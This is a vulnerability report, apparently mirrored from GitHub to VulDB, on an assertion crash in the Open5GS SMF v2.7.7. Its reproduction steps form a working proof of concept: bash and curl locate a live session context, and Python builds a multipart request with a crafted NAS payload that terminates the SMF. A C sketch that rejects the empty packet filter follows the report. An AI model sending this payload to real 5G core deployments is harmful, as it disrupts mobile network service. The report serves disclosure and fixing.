Submit #808488: Open5gs SMF v2.7.7 Denial of Service

Title: Open5gs SMF v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

SMF crashes when a `PDU Session Modification Request` delivered through `SmContextUpdateData.n1SmMsg` carries a syntactically valid `requested_qos_rules` IE whose packet filter list contains one packet filter with `content.length = 0`.

`ogs_nas_parse_qos_rules()` accepts the rule and leaves `rule->pf[i].content.num_of_component = 0`. Later `gsm_handle_pdu_session_modification_qos_rules()` allocates a packet filter and asserts that reconfiguration produced at least one component:

```c
pf = smf_pf_add(qos_flow);
ogs_assert(pf);
ogs_assert(reconfigure_packet_filter(pf, &qos_rule[i], i) > 0);
```

For an empty packet-filter content, `reconfigure_packet_filter()` returns `0`, so the assertion aborts the SMF process.

This issue is distinct from the `invalid bitrate unit` bug above: that one is in QoS flow description bitrate conversion, while this one is an assert on the QoS rule packet-filter business logic.

### Steps to reproduce

1. Start the Docker lab and ensure `smf` and `smf-audit-ue` are running.

2. Resolve the current SMF container IP and an active `smContextRef`:

```bash
SMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' smf)
docker restart smf-audit-ue >/dev/null
sleep 3
REF=$(
  for i in $(seq 1 30); do
    code=$(curl --http2-prior-knowledge -m 5 -sS -o /tmp/probe.body -w '%{http_code}' \
      -X POST "http://$SMF_IP/nsmf-pdusession/v1/sm-contexts/$i/modify" \
      -H 'Content-Type: application/json' \
      --data '{"hoState":"COMPLETED"}')
    if [ "$code" != 404 ]; then
      echo "$i"
      break
    fi
  done
)
echo "SMF_IP=$SMF_IP REF=$REF"
```

3. Prepare a multipart `SmContextUpdateData` with only `n1SmMsg`, using the malicious NAS payload below. The payload is a `PDU Session Modification Request` whose `requested_qos_rules` uses `MODIFY_EXISTING_QOS_RULE_AND_ADD_PACKET_FILTERS`, but the only packet filter has `content.length = 0`:

```bash
python3 - <<'PY'
from pathlib import Path
import json

boundary = 'REQBOUNDARY'
body = {'n1SmMsg': {'contentId': '5gnas-sm'}}
n1 = bytes.fromhex('2e0101c97a00080100056120000f01')

parts = []
parts.append(
    (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode())
    + json.dumps(body, separators=(',', ':')).encode()
    + b'\r\n'
)
parts.append(
    (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n'
     f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode())
    + n1
    + b'\r\n'
)
parts.append(f'--{boundary}--\r\n'.encode())
Path('/tmp/smctx_modify_empty_pf.multipart').write_bytes(b''.join(parts))
PY
```

4. Send the request:

```bash
curl --http2-prior-knowledge -m 10 -sS -i \
  -X POST "http://$SMF_IP/nsmf-pdusession/v1/sm-contexts/$REF/modify" \
  -H 'Content-Type: multipart/related; boundary=REQBOUNDARY' \
  --data-binary @/tmp/smctx_modify_empty_pf.multipart
```

5. Check the SMF process state and logs:

```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --tail 120 smf
```

### Logs

```shell
Client side:
curl: (56) Recv failure: Connection reset by peer

SMF state:
exited 139 2026-04-11T07:54:37.832480109Z

SMF log:
04/11 07:54:37.740: [gsm] FATAL: gsm_handle_pdu_session_modification_qos_rules: Assertion `reconfigure_packet_filter(pf, &qos_rule[i], i) > 0' failed. (../src/smf/gsm-handler.c:274)
```

### Expected behaviour

SMF should reject QoS rules whose packet filter content is empty and return a normal protocol error for that request.

### Observed Behaviour

The crafted `n1SmMsg` aborts the entire SMF process before any HTTP response is completed, resetting the client connection and terminating the SMF container with exit code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
Source: https://github.com/open5gs/open5gs/issues/4451
User: FrankLin (UID 97501)
Submission: 20.04.2026 21:22 (1 month ago)
Moderation: 10.05.2026 17:44 (20 days later)
Status: Accepted
VulDB entry: 362567 [Open5GS up to 2.7.7 SMF ogs_nas_parse_qos_rules Denial of Service]
Points: 20
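The rejection described under "Expected behaviour", as an added sketch in C that is not Open5GS code and not taken from the submission: it walks the value part of a QoS rules IE and returns an error for a packet filter with zero-length contents, so the caller can answer with a protocol error instead of reaching an assertion. The function name, return codes and the second sample array are assumptions made for this example; the first sample array is the IE value from the submission's `n1SmMsg`.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical return codes for this sketch (not Open5GS names). */
enum { QOS_OK = 0, QOS_TRUNCATED = -1, QOS_EMPTY_PF = -2 };

/* IE value from the page's n1SmMsg (bytes after IEI 0x7a, length 0x0008). */
static const uint8_t page_ie[] = { 0x01, 0x00, 0x05, 0x61, 0x20, 0x00, 0x0f, 0x01 };
/* Constructed contrast: same rule, filter contents = one match-all component. */
static const uint8_t ok_ie[] = { 0x01, 0x00, 0x06, 0x61, 0x20, 0x01, 0x01, 0x0f, 0x01 };

/* Rule operations whose packet filters carry length + contents:
 * 1 = create new, 3 = modify and add, 4 = modify and replace all. */
static int op_has_pf_contents(uint8_t op)
{
    return op == 1 || op == 3 || op == 4;
}

/* Bounds-checked walk over every rule; only the packet filter list is checked. */
int check_qos_rules(const uint8_t *v, size_t len)
{
    size_t off = 0;
    while (off < len) {
        if (len - off < 3) return QOS_TRUNCATED;
        size_t rule_len = ((size_t)v[off + 1] << 8) | v[off + 2];
        off += 3;                               /* rule id + 2-byte length */
        if (rule_len < 1 || rule_len > len - off) return QOS_TRUNCATED;
        const uint8_t *r = v + off;
        uint8_t op = r[0] >> 5, num_pf = r[0] & 0x0f;
        size_t p = 1;
        for (uint8_t i = 0; op_has_pf_contents(op) && i < num_pf; i++) {
            if (rule_len - p < 2) return QOS_TRUNCATED;
            uint8_t content_len = r[p + 1];     /* r[p] = direction + filter id */
            if (content_len == 0) return QOS_EMPTY_PF;   /* reject, do not assert */
            p += 2;
            if (content_len > rule_len - p) return QOS_TRUNCATED;
            p += content_len;
        }
        off += rule_len;                        /* skip precedence/QFI octets */
    }
    return QOS_OK;
}

int main(void)
{
    printf("page IE: %d\n", check_qos_rules(page_ie, sizeof page_ie));
    printf("constructed IE: %d\n", check_qos_rules(ok_ie, sizeof ok_ie));
    return 0;
}
```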
